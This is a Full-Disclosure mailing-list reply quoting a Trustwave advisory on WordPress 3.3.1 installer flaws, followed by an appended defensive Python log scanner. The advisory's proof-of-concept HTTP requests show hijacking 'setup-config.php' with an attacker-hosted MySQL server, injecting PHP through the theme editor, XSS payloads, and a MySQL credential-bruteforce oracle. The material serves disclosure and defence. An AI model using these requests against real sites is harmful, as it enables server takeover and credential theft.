
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress



On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
> Trustwave's SpiderLabs Security Advisory TWSL2012-002:
> Multiple Vulnerabilities in WordPress
> 
> https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
> 
> Published: 1/24/12
> Version: 1.0
> 
> Vendor: WordPress (http://wordpress.org/)
> Product: WordPress
> Version affected: 3.3.1 and prior
> 
> Product description:
> WordPress is a free and open source blogging tool and publishing platform
> powered by PHP and MySQL.
> 
> Credit: Jonathan Claudius of Trustwave SpiderLabs
> 
> Finding 1: PHP Code Execution and Persistent Cross Site Scripting
> Vulnerabilities via 'setup-config.php' page.
> CVE: CVE-2011-4899
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. This typically requires a user
> to have valid MySQL credentials to complete.  However, a malicious user can
> host their own MySQL database server and can successfully complete the
> WordPress installation without having valid credentials on the target system.
> 
> After the successful installation of WordPress, a malicious user can inject
> malicious PHP code via the WordPress Themes editor.  In addition, with control
> of the database store, malicious Javascript can be injected into the content
> of WordPress yielding persistent Cross Site Scripting.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> W.X.Y.Z = Malicious User's MySQL Instance
> 
> 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
> 
> 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
> 
> Request #1
> ----------
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 81
> 
> dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
> 
> Request #2
> ----------
> GET /wp-admin/install.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
> 
> 3.) Get PHP Code Execution
> 
> Malicious user edits 404.php via Themes Editor as follows:
> 
> <?php
> phpinfo();
> ?>
> 
> Note #1: Any php file in the theme could be used.
> Note #2: Depending on settings, PHP may be used to execute system commands
>          on the webserver.
> 
> Malicious user performs get request of modified page to execute code.
> 
> Request
> -------
> GET /wp-content/themes/default/404.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
> 
> 4.) Get Persistent Cross Site Scripting
> 
> Malicious User injects malicious Javascript into their own MySQL database instance
> 
> MySQL Query
> -----------
> update wp_comments SET
> comment_content='<script>alert(\'123\')</script>' where comment_content='Hi,
> this is a comment.<br />To delete \ a comment, just log in and view the
> post&#039;s comments. There you will have the option to edit or delete
> them.';
> 
> Non-malicious user visits the WordPress installation and has Javascript executed
> in their browser
> 
> Request
> -------
> GET /?p=1 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
> 
> 
> 
> Finding 2: Multiple Cross Site Scripting Vulnerabilities in
> 'setup-config.php' page
> CVE: CVE-2012-0782
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. When using this installation page
> the user is asked to supply the database name, the server that the database
> resides on, and a valid MySQL username and password.
> 
> During this process, malicious users can supply javascript within
> the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission
> button, the javascript is rendered in the client's browser.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> 
> Request
> -------
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 112
> 
> dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit
> 
> 
> 
> Finding 3: MySQL Server Username/Password Disclosure Vulnerability via
> 'setup-config.php' page
> CVE: CVE-2011-4898
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. When using this installation page
> the user is asked to supply the database name, the server the database resides
> on, and a valid MySQL username and password.
> 
> Malicious users can omit the "dbname" parameter during this process, allowing
> them to continually bruteforce MySQL instance usernames and passwords. This
> includes any local or remote MySQL instances which are accessible to the
> target web server. This can also be used as a method to proxy MySQL bruteforce
> attacks against other MySQL instances outside of the target organization.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> L.M.N.O = Any MySQL Server for which the Web Server has network access
> 
> Request
> -------
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 32
> 
> uname=mysql&pwd=mysql&dbhost=L.M.N.O
> 
> Response (If Password is Valid)
> -------------------------------
> <---snip-->
> We were able to connect to the database server (which means your username
> and password is okay) but not able to select the database.
> <---snip-->
> 
> Response (If Password is Invalid)
> ---------------------------------
> <---snip-->
> This either means that the username and password information in your
> wp-config.php file is incorrect or we can't contact the database server at
> localhost. This could mean your host's database server is down.
> <---snip-->
> 
> 
> Vendor Response:
> Due to the fact that the component in question is an installation script,
> the vendor has stated that the attack surface is too small to warrant
> a fix:
> 
> "We give priority to a better user experience at the install process. It is
> unlikely a user would go to the trouble of installing a copy of WordPress
> and then not finishing the setup process more-or-less immediately. The
> window of opportunity for exploiting such a vulnerability is very small."
> 
> However, Trustwave SpiderLabs urges caution in situations where the
> WordPress installation script is provided as part of a default image.
> This is  often done as a convenience on hosting providers, even in
> cases where the client does not use the software. It is a best practice
> to ensure  that no installation scripts are exposed to outsiders, and
> these vulnerabilities reinforce the importance of this step.
> 
> 
> Remediation Steps:
> No official fix for these issues will be released for the WordPress
> publishing platform. However, administrators can mitigate these issues by
> creating strong MySQL passwords and defining rules within a web application
> firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has
> added rules to the commercial rules feed for these issues, and Trustwave's
> vulnerability scanning solution, TrustKeeper, has been updated to detect
> exposed installation scripts.
> 
> 
> Vendor Communication Timeline:
> 12/22/11 - Vulnerability disclosed
> 01/16/12 - Confirmation to release vulnerabilities
> 01/24/12 - Advisory published
> 
> 
> References
> 1. http://www.wordpress.org
> 
> 
> About Trustwave:
> Trustwave is the leading provider of on-demand and subscription-based
> information security and payment card industry compliance management
> solutions to businesses and government entities throughout the world. For
> organizations faced with today's challenging data security and compliance
> environment, Trustwave provides a unique approach with comprehensive
> solutions that include its flagship TrustKeeper compliance management
> software and other proprietary security solutions. Trustwave has helped
> thousands of organizations--ranging from Fortune 500 businesses and large
> financial institutions to small and medium-sized retailers--manage
> compliance and secure their network infrastructure, data communications and
> critical information assets. Trustwave is headquartered in Chicago with
> offices throughout North America, South America, Europe, Africa, China and
> Australia. For more information, visit https://www.trustwave.com
> 
> About Trustwave's SpiderLabs:
> SpiderLabs(R) is the advanced security team at Trustwave focused on
> application security, incident response, penetration testing, physical
> security and security research. The team has performed over a thousand
> incident investigations, thousands of penetration tests and hundreds of
> application security tests globally. In addition, the SpiderLabs Research
> team provides intelligence through bleeding-edge research and proof of
> concept tool development to enhance Trustwave's products and services.
> https://www.trustwave.com/spiderlabs
> 
> Disclaimer:
> The information provided in this advisory is provided "as is" without
> warranty of any kind. Trustwave disclaims all warranties, either express or
> implied, including the warranties of merchantability and fitness for a
> particular purpose. In no event shall Trustwave or its suppliers be liable
> for any damages whatsoever including direct, indirect, incidental,
> consequential, loss of business profits or special damages, even if
> Trustwave or its suppliers have been advised of the possibility of such
> damages. Some states do not allow the exclusion or limitation of liability
> for consequential or incidental damages so the foregoing limitation may not
> apply.
> 
> This transmission may contain information that is privileged, confidential, 
> and/or exempt from disclosure under applicable law. If you are not the 
> intended recipient, you are hereby notified that any disclosure, copying, 
> distribution, or use of the information contained herein (including any 
> reliance thereon) is STRICTLY PROHIBITED. If you received this transmission 
> in error, please immediately contact the sender and destroy the material in 
> its entirety, whether in electronic or hard copy format.

These haven't been fixed and some of these issues have been known for a while if 
you talk to users of WordPress or administrators of servers using the software. 
I am not saying that these are not real issues or anything like that. Have you 
contacted WordPress? Did they reply that they will fix these issues?

- Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
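The advisory's remediation section comes down to two defensive controls: make sure no unconfigured installer is reachable, and watch for traffic to it. The script below is an added example written for this thread; it is not code from Trustwave, ModSecurity or WordPress. It assumes Apache/nginx "combined" access-log lines (request bodies, and so the dbhost/uname/pwd values, are not in such logs, so it keys on path, method and volume), uses constructed sample lines with RFC 5737 documentation addresses, and treats the five-request threshold and the directory layout (wp-admin/setup-config.php present, wp-config.php absent) as assumptions about the deployment being checked.

```python
"""Defender-side checks for exposed WordPress installation scripts.

Added example for the TWSL2012-002 thread; not part of the advisory or
of WordPress. Sample log lines below are constructed, not real traffic.
"""
import os
import re
from collections import defaultdict

# Apache/nginx "combined" format:
#   client ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Both installer endpoints that the advisory's three findings go through.
INSTALLER_PATHS = ("/wp-admin/setup-config.php", "/wp-admin/install.php")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines, post_threshold=5):
    """Flag installer traffic in an iterable of access-log lines.

    Returns a list of (kind, ip, detail) tuples:
      "installer-hit"     any request that reached an installer path
      "setup-bruteforce"  one client POSTing to setup-config.php?step=2 at
                          least post_threshold times, which is what the
                          Finding 3 credential oracle looks like in a log
    post_threshold is an assumed tuning value, not a WordPress constant.
    """
    alerts = []
    step2_posts = defaultdict(int)
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:          # unparseable line: skip, do not crash
            continue
        path = rec["path"].split("?", 1)[0]
        if path not in INSTALLER_PATHS:
            continue
        alerts.append(("installer-hit", rec["ip"], f'{rec["method"]} {rec["path"]}'))
        if rec["method"] == "POST" and "step=2" in rec["path"]:
            step2_posts[rec["ip"]] += 1
    for ip, n in sorted(step2_posts.items()):
        if n >= post_threshold:
            alerts.append(("setup-bruteforce", ip,
                           f"{n} POSTs to setup-config.php?step=2"))
    return alerts


def find_unconfigured_installs(root):
    """Walk `root` for document roots where wp-admin/setup-config.php exists
    but wp-config.php does not: the state in which the installer will accept
    an arbitrary dbhost. Returns a sorted list of such directories."""
    exposed = []
    for dirpath, dirnames, filenames in os.walk(root):
        installer = os.path.join(dirpath, "wp-admin", "setup-config.php")
        if "wp-admin" in dirnames and os.path.isfile(installer):
            if "wp-config.php" not in filenames:
                exposed.append(dirpath)
    return sorted(exposed)


# Constructed sample traffic (RFC 5737 addresses). One client walks the
# installer and hammers step=2; another makes a single step=2 POST.
_UA = '"-" "Mozilla/5.0"'
_T = "[24/Jan/2012:16:09:16 -0600]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_T} "GET /?p=1 HTTP/1.1" 200 4212 {_UA}',
    f'198.51.100.9 - - {_T} "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 200 2100 {_UA}',
] + [
    f'198.51.100.9 - - {_T} "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 1800 {_UA}'
    for _ in range(5)
] + [
    f'198.51.100.9 - - {_T} "GET /wp-admin/install.php HTTP/1.1" 200 3000 {_UA}',
    f'203.0.113.7 - - {_T} "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 1800 {_UA}',
    "this line is deliberately malformed and must be skipped",
]

if __name__ == "__main__":
    for kind, ip, detail in scan_access_log(SAMPLE_LOG):
        print(f"{kind:18} {ip:14} {detail}")
```

Run against the sample it reports eight installer hits and one brute-force alert for 198.51.100.9; the single POST from 203.0.113.7 stays below the threshold and is only an installer hit. `find_unconfigured_installs` is the filesystem counterpart of the "exposed installation script" check the advisory mentions: point it at a hosting root and every directory it returns is a site where setup-config.php would still accept a remote dbhost.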